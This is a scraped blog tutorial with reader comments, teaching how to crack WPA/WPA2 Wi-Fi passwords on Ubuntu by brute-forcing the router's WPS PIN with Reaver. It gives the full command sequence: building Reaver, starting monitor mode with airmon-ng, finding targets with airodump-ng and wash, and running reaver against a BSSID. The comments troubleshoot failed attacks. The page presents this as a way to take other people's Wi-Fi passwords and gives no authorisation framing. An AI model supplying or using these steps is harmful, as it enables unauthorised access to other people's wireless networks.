Sunteți pe pagina 1din 13

Home  Ubuntu 

Learn to Hack WIFI


Learn2Crack password with Ubuntu
(WPA/WPA2)

Learn to
Hack WIFI
password
with Ubuntu
(WPA/WPA2)
 July 3, 2013  Raj Amal  Ubuntu  301 Comments

In this hacking tutorial


366
we are going
SHARES to use a a d J #
new vulnerability in
WPA and WPA 2
(PSK/TKIP)Wireless
passwords, this weak
point is to attack WPS,
Which is Wireless
Protected Setup. This
type of setup is built in
90% of routers to allow
easy establishment of
secure home wireless
by the user, though it
has been shown to fall
to BruteForce Attacks.
This BruteForce attack
will try all combinations
of Router’s PIN number
(Provided by WPS) and
access the router to
reveal the password.
This type of hack have
many bene ts such
as, You can always
have the Wireless
Password even if It’s
changed by knowing
the PIN number.

Steps To Hack
WPA/WPA2
Passwords using
Ubuntu (Reaver)

Follow these simple


steps.

366
SHARES a d J #
Step 1 (Setting up
Reaver 1.4 )

1) Open terminal and


type

sudo -s

and then type your


password.

2) Download Reaver (Better
Download the Latest
Version ) Place in a
speci ed folder.

3) Open the Terminal


and type

tar xvfz reaver-


1.4.tar.gz

4) Install dependencies

sudo apt-get
install libpcap-dev

then

sudo apt-get
install libsqlite3-
dev

Note: libpcap and
libsqlite3 maybe
366
SHARES a d J #
included in your Ubuntu
version but they are
very important.

5) Enter the folder by


typing

cd reaver-1.4/src

6) Type

./configure

7) Type

make

8) Type

 make install

Note: To test if Reaver


have been successfully
installed, Open a
Terminal and Type
‘reaver’ and hit enter, it
should list all Reaver’s
sub commands.

Step 2 ( Hacking
WPA/WPA2
Wireless)

After installing reaver


366
1.4, it’s SHARES
time to proceed a d J #
to the main part which
is hacking wireless
passwords that uses
WPA/WPA2 Encryption.
Requirements:
Install aircrack-ng by
typing

sudo apt-
get install aircrack-
ng

Airodump-ng / Airmon-
ng commands

Reaver 1.4 (Install in
Step 1)

1) We need to have the


wireless BSSID (Mac
address) so we use
airodump-ng. Open a
terminal and Type :

airmon-ng start
wlan0

Type

airodump-ng mon0

It will lists the available


wireless passwords,
now copy the BSSID of
the Access Point ( e.g
366
: 00:11:28:32:49:55 )
SHARES a d J #
2) Starting the attack
type:

 reaver -i mon0 -b
00:11:28:32:49:55

Now it will start testing


bruteforcing the PIN
number of the
vulnerability WPS
(which we have spoke
about it), and it will
show you the
WPA/WPA2 Password
in the end of the Crack.

Note: You can
use walsh -i mon0 to
scan for vulnerable
Access Points.

Screenshot:

366
SHARES a d J #
For better idea follow
the video on the top of
this page.

 Bio  Twitter  Google+  LinkedIn  Latest Posts

Raj Amal
Developer at Learn2Crack

Raj Amal is an Android


Developer. He Loves to
code and explores new
technologies. He also
authored a book
Learning Android
Google Maps

 Hack, Ubuntu, WiFi

366
SHARES a d J #
Related Posts

How to Update the Hack Webcam on Run Windows


Linux kernel in Ubuntu Network using Ubuntu Applications in Ubuntu
to Latest Stable Version September 12, 2013 Linux Easily
September 7, 2013 August 31, 2013

Learn2Crack Comment
Policy


Please be respectful to
other readers.
Comments with links
require approval.

301 Comments Learn2Crack 


1 Login

 Recommend 22 t Tweet f Share Sort by Best

Join the discussion…

LOG IN WITH OR SIGN UP WITH DISQUS ?

Name

Deepak
− ⚑
5 years ago
[+] Waiting for beacon
from 30:85:A9:36:9A:80

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
366
(ESSID: SHARES
(null)) a d J #
[!] WARNING: Failed to
associate with
30:85:A9:36:9A:80
(ESSID: (null))

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)

[!] WARNING: Failed to


associate with
30:85:A9:36:9A:80
(ESSID: ABHISHEK)
⛺ View

45 △ ▽ Reply

rajit > Deepak


− ⚑
5 years ago
m also having the same
problem is there any
solution for it
1△ ▽ Reply

366Enrico
a d J #
Gnauk > rajit
− ⚑
5 years ago
SHARES
I had the same problem
I had the same problem
after installing Ubuntu
14.04. ! There is a very
usefull site:
http://forum.aircrack-
ng.or...
User: "kcdtv" wrote there
the solution for the
problem.....
16 △ ▽ Reply

sultan > Enrico Gnauk


5 years ago
− ⚑

Thank you this woked ,


thank you sooooo much
bro , thank you
△ ▽ Reply

Ahmed Usmani > sultan


3 years ago
− ⚑

can u helppme up bro


△ ▽ Reply

Meric > Enrico Gnauk


− ⚑
3 years ago
Hi.
Sorry to go back on that
subject so long after it
ended.
I successfully installed
reaver, but same
problem.

When I launch it, with


"sudo reaver -i mon0 -b
XX:XX:XX:XX:XX:XX -vv",
the only thing I got is :

[!] WARNING: Failed to


associate with
XX:XX:XX:XX:XX:XX
(ESSID: (null))

I already saw your


solution, but even after I
found an older version, it
don't work.
I am on linux mint 17.1

Is it366
still working for you?
SHARES a d J #
△ ▽ Reply
py

Rajan Yadav > Meric


− ⚑
a year ago
Either you are very far
away from that wifi
source or very less
signal available there.So
get close to source for
better signal then
try......hope this will work
△ ▽ Reply

babalalex > Meric


2 years ago edited
− ⚑

Hi meric,

Did you find any solution


with the same?
As I have been struggling
enough for this but no
luck.
I am unable to get the
previous version as well
since Since website says
404 Not Found.

Thanks.
△ ▽ Reply

Imran > babalalex


2 years ago
− ⚑

I found the previous


version but it didn't work
on Ubuntu 16.04 LTS
△ ▽ Reply

Gaye > Deepak


7 months ago
− ⚑

bitch plz
△ ▽ Reply

SrinivasReddy AnnapaReddy
− ⚑
5 years ago
when i am typing in
terminal

tar Home reaver-


1.4.tar.gz its getting
366 format.
invalid archive
SHARES
Please any one Help me.
a d J #
y p
42 △ ▽ Reply

Anonymous
6 years ago
− ⚑

placed the tar xvfz


reaver-1.4.tar.gz in which
folder??
30 △ ▽ Reply

Anil > Anonymous


− ⚑
6 years ago
Any folder and then i will
be extracted there and
so do "cd reaver-1.4/src"
as mentioned above.
1△ ▽ Reply

nate > Anil


− ⚑
4 years ago

it says there is no such


directory. what do i do
1△ ▽ Reply

Joy > nate


− ⚑
3 years ago
this command is used to
untar a file(similar to
extracting a zip file),
so to do it, you need to
first go to the directory
where it is
downloaded, then press
this command
Coz, you need to be in
the same folder, where
the file is

if you know the path


where your file is kept
then simply cd to that
folder, then untar it

IF YOU ARE New to


Ubuntu , and you have
downloaded it via
Mozilla then by default it
is in the Downloads
folder
366
SHARES
to get there type: (or
a d J #
simply copy-paste :D)

cd ~/Downloads

then use "tar xzvf reaver-


1.4.tar.gz
△ ▽ Reply

Rahul K. Rajeev > Joy


− ⚑
a year ago edited
thanku it works
△ ▽ Reply

Lakshya > Anil


5 years ago
− ⚑

It is getting the same


error
△ ▽ Reply

Bilal A Ruikar > Anonymous


− ⚑
5 years ago
in home folder.
△ ▽ Reply

NiCoLaS > Anonymous


− ⚑
5 years ago

keep it in home folder.....


△ ▽ Reply

Dark rose
5 years ago
− ⚑

root@Dark-
rose:~/Downloads#
sudo apt-get install
libpcap-dev
Reading package lists...
Done
Building dependency tree
Reading state
information... Done

366
SHARES a d J #

S-ar putea să vă placă și